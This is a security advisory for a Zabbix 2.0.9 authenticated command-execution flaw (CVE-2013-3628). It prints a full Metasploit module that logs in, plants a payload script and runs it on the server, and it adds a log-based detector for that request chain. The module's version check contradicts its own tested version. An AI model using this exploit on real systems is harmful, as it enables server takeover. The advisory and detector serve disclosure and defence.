
Zabbix Arbitrary Command Execution Vulnerability (CVE-2013-3628)

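Published: 2013-10-30
Updated: 2013-11-02

Affected systems:
ZABBIX ZABBIX v2.0.9

Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 63453
CVE(CAN) ID: CVE-2013-3628

ZABBIX is a distributed network monitoring system with a client/server architecture. Zabbix 2.0.9 and other versions allow an administrator to run scripts they have created on hosts; an authenticated attacker can exploit this to run malicious scripts on the host.

<*Source: Brandon Perry
  *>

Test method:
--------------------------------------------------------------------------------
Warning: the following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!

##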
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require "msf/core"

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      "Name"         => "Zabbix Authenticated Remote Command Execution",
      "Description"    => %q{
      ZABBIX allows an administrator to create scripts that will be run on hosts.
      An authenticated attacker can create a script containing a payload, then a host
      with an IP of 127.0.0.1 and run the arbitrary script on the ZABBIX host.

      This module was tested against Zabbix v2.0.9.
      },
      "License"        => MSF_LICENSE,
      "Author"       =>
        [
          "Brandon Perry <bperry.volatile[at]gmail.com>" # Discovery / msf module
        ],
      "References"   =>
        [
          ["CVE", "2013-3628"],
          ["URL", "https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"]
        ],
      "Payload"        =>
      {
        "Compat"   =>
        {
          "PayloadType"  => "cmd",
          "RequiredCmd"  => "generic perl ruby bash telnet python",
        }
      },
      "Platform"     => ["unix", "linux"],
      "Arch"         => ARCH_CMD,
      "Targets"        => [["Automatic",{}]],
      "DisclosureDate" => "Oct 30 2013",
      "DefaultTarget"  => 0
    ))

    register_options(
    [
      OptString.new("USERNAME", [ true, "Username to authenticate with", "Admin"]),
      OptString.new("PASSWORD", [ true, "Password to authenticate with", "zabbix"]),
      OptString.new("TARGETURI", [ true, "The URI of the Zabbix installation", "/zabbix/"])
    ], self.class)
  end

  def check
    init = send_request_cgi({
      "method" => "GET",
      "uri" => normalize_uri(target_uri.path, "/index.php")
    })

    if !init or init.code != 200
      print_error("Could not connect to server")
      return Exploit::CheckCode::Unknown
    end

    # Extract the version string from the login page footer
    if init.body =~ /Zabbix (2\.0\.(\d)) Copyright/
      if $1 >= "2.0.0" and $1 <= "2.0.8"
        print_good("Version #{$1} is vulnerable.")
        return Exploit::CheckCode::Vulnerable
      end
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    c = connect

    req = c.request_cgi({
      "method" => "POST",
      "uri" => "/zabbix/",
      "data" => "request=&name=" << datastore["USERNAME"] << "&password=" << datastore["PASSWORD"] << "&enter=Sign+in"
    })

    login = c.send_recv(req.to_s.sub("Host:", "Host: " << datastore["RHOST"]))

    if !login or login.code != 302
      fail_with("Login failed")
    end

    sess = login.headers["Set-Cookie"]

    dash = send_request_cgi({
      "method" => "GET",
      "uri" => normalize_uri(target_uri.path, "/dashboard.php"),
      "cookie" => sess
    })

    if !dash or dash.code != 200
      fail_with("Dashboard failed")
    end

    sid = ""
    dash.body.each_line do |line|
      if line =~ /&sid=(.{16})">/
        sid = $1
        break
      end
    end

    if sid == ""
      fail_with("Could not get sid")
    end

    script_title = rand_text_alpha(18)
    post = {
      "sid" => sid,
      "form_refresh" => 3,
      "form" => "Create+script",
      "name" => script_title,
      "type" => 0,
      "execute_on" => 1,
      "command" => payload.encoded,
      "commandipmi" => "",
      "description" => "",
      "usrgrpid" => 0,
      "groupid" => 0,
      "access" => 2,
      "save" => "Save"
    }

    resp = send_request_cgi({
      "method" => "POST",
      "uri" => normalize_uri(target_uri.path, "/scripts.php"),
      "vars_post" => post,
      "cookie" => sess
    })

    if !resp or resp.code != 200
      fail_with("Error creating script")
    end

    script_id = ""
    if resp.body =~ /scriptid=(\d{1,8})&sid=#{sid}">#{script_title}/
      script_id = $1
    else
      fail_with("Could not get the script id")
    end

    host = rand_text_alpha(18)
    post = {
      "sid" => sid,
      "form_refresh" => 1,
      "form" => "Create+host",
      "host" => host,
      "visiblename" => host,
      "groups_left" => 4,
      "newgroup" => "",
      "interfaces[1][isNew]" => true,
      "interfaces[1][interfaceid]" => 1,
      "interfaces[1][type]" => 1,
      "interfaces[1][ip]" => "127.0.0.1",
      "interfaces[1][dns]" => "",
      "interfaces[1][useip]" => 1,
      "interfaces[1][port]" => 10050,
      "mainInterfaces[1]" => 1,
      "proxy_hostid" => 0,
      "status" => 0,
      "ipmi_authtype" => -1,
      "ipmi_privilege" => 2,
      "ipmi_username" => "",
      "ipmi_password" => "",
      "macros[0][macro]" => "",
      "macros[0][value]" => "",
      "inventory_mode" => -1,
      "save" => "Save",
      "groups[4]" => 4
    }

    resp = send_request_cgi({
      "method" => "POST",
      "uri" => normalize_uri(target_uri.path, "/hosts.php"),
      "vars_post" => post,
      "cookie" => sess
    })

    if !resp or resp.code != 200
      fail_with("Error creating new host")
    end

    hostid = ""
    if resp.body =~ /hosts\.php\?form=update&hostid=(\d{1,12})&groupid=(\d)&sid=#{sid}">#{host}/
      hostid = $1
    else
      fail_with("Could not get the host id")
    end

    send_request_cgi({
      "method" => "GET",
      "uri" => normalize_uri(target_uri.path, "/scripts_exec.php?execute=1&hostid=#{hostid}&scriptid=#{script_id}&sid=#{sid}"),
      "cookie" => sess
    })
  end
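end

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

ZABBIX
------
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version.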
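
Detection example (added here; not part of the original advisory or of the Metasploit module): the module above issues a fixed request sequence from one client, POST scripts.php, then POST hosts.php, then GET scripts_exec.php?execute=1, so a web access log can be searched for that chain. The combined log format, the 300-second window, the function names and the sample log lines are assumptions made for this example.

```ruby
require "time"

# Constructed sample access-log lines (combined log format); not from a real server.
SAMPLE_LOG = <<~LOG
  198.51.100.7 - - [30/Oct/2013:10:00:01 +0000] "POST /zabbix/ HTTP/1.1" 302 0
  198.51.100.7 - - [30/Oct/2013:10:00:02 +0000] "GET /zabbix/dashboard.php HTTP/1.1" 200 5120
  198.51.100.7 - - [30/Oct/2013:10:00:03 +0000] "POST /zabbix/scripts.php HTTP/1.1" 200 4096
  198.51.100.7 - - [30/Oct/2013:10:00:04 +0000] "POST /zabbix/hosts.php HTTP/1.1" 200 4096
  198.51.100.7 - - [30/Oct/2013:10:00:05 +0000] "GET /zabbix/scripts_exec.php?execute=1&hostid=10105&scriptid=4&sid=0123456789abcdef HTTP/1.1" 200 310
  192.0.2.10 - - [30/Oct/2013:11:15:00 +0000] "GET /zabbix/scripts_exec.php?execute=1&hostid=10084&scriptid=1&sid=fedcba9876543210 HTTP/1.1" 200 290
LOG

LINE_RE = %r{\A(\S+) \S+ \S+ \[([^\]]+)\] "(GET|POST) (\S+) HTTP/[\d.]+" (\d{3}) }
WINDOW  = 300 # seconds between create and execute; assumed threshold, tune per site

# Parse one access-log line into a hash, or return nil if it does not match.
def parse(line)
  m = LINE_RE.match(line) or return nil
  path, query = m[4].split("?", 2)
  { ip: m[1], time: Time.strptime(m[2], "%d/%b/%Y:%H:%M:%S %z"),
    method: m[3], page: File.basename(path), query: query.to_s, status: m[5].to_i }
end

# Flag a client that created a script AND a host, then executed a script,
# all within `window` seconds. Executing an existing script alone is not flagged.
def detect_script_chain(log_text, window: WINDOW)
  seen = Hash.new { |h, k| h[k] = {} } # ip => { page => time of last successful POST }
  alerts = []
  log_text.each_line do |line|
    e = parse(line.chomp) or next
    next unless e[:status] == 200
    if e[:method] == "POST" && %w[scripts.php hosts.php].include?(e[:page])
      seen[e[:ip]][e[:page]] = e[:time]
    elsif e[:page] == "scripts_exec.php" && e[:query] =~ /(?:\A|&)execute=1(?:&|\z)/
      recent = %w[scripts.php hosts.php].all? do |page|
        t = seen[e[:ip]][page]
        t && (e[:time] - t).between?(0, window)
      end
      next unless recent
      alerts << { ip: e[:ip], time: e[:time],
                  hostid: e[:query][/hostid=(\d+)/, 1],
                  scriptid: e[:query][/scriptid=(\d+)/, 1] }
    end
  end
  alerts
end
```

A hit gives the hostid and scriptid to look up in the Zabbix scripts and hosts tables, where a script set to run on the server against a newly created 127.0.0.1 host is the configuration the module leaves behind.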